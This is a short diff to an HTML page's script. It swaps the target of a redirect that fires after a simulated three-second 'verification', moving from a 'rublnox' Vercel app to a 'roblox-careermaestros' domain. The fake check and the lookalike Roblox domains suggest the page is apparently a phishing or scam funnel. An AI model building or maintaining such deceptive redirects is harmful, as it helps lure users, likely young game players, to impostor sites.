--- a/index.html
+++ b/index.html
@@ -278,7 +278,7 @@
             
             // Simulate verification for 3 seconds THEN redirect
             setTimeout(function() {
-                window.location.href = "https://rublnox-abdessamads-projects-0f41d1c1.vercel.app/";
+                window.location.href = "https://www.roblox-careermaestros.site";
             }, 3000);
         }
         
